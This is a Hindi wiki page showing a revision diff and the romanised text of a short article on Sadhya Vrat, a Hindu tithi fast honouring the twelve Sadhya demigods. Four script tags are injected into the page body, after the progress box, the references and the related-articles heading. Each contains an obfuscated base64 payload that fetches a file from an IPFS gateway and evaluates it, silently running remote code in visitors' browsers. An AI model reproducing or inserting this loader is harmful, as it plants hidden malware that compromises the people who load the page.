Difference between revisions of "साध्य व्रत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "{{लेख प्रगति" to "{{प्रचार}} {{लेख प्रगति")
m (Text replace - ")</ref" to "</ref")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।  
 
*[[मार्गशीर्ष]] [[शुक्ल पक्ष]] की [[द्वादशी]] पर साध्यव्रत किया जाता है।
 
*[[मार्गशीर्ष]] [[शुक्ल पक्ष]] की [[द्वादशी]] पर साध्यव्रत किया जाता है।
 
*साध्यव्रत तिथिव्रत है।
 
*साध्यव्रत तिथिव्रत है।
 
*साध्यव्रत [[देवता]] साध्य गण हैं।
 
*साध्यव्रत [[देवता]] साध्य गण हैं।
 
*साध्यव्रत एक वर्ष तक किया जाना चाहिए।
 
*साध्यव्रत एक वर्ष तक किया जाना चाहिए।
*साध्यव्रत साध्य गण 12 अर्धदेव कहे जाते हैं।<ref>हेमाद्रि (व्रत खण्ड 1, 1173, विष्णुधर्मोत्तरपुराण 3|181|1-3 से उद्धरण)</ref>
+
*साध्यव्रत साध्य गण 12 अर्धदेव कहे जाते हैं।<ref>हेमाद्रि (व्रत खण्ड 1, 1173, विष्णुधर्मोत्तरपुराण 3|181|1-3 से उद्धरण</ref>
 
*विष्णुधर्मोत्तरपुराण में 12 साध्यों के नाम दिये हैं।
 
*विष्णुधर्मोत्तरपुराण में 12 साध्यों के नाम दिये हैं।
 
{{प्रचार}}
 
{{प्रचार}}
Line 14: Line 14:
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 13:02, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • margashirsh shukl paksh ki dvadashi par sadhyavrat kiya jata hai.
  • sadhyavrat tithivrat hai.
  • sadhyavrat devata sadhy gan haian.
  • sadhyavrat ek varsh tak kiya jana chahie.
  • sadhyavrat sadhy gan 12 ardhadev kahe jate haian.[1]
  • vishnudharmottarapuran mean 12 sadhyoan ke nam diye haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. hemadri (vrat khand 1, 1173, vishnudharmottarapuran 3|181|1-3 se uddharan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>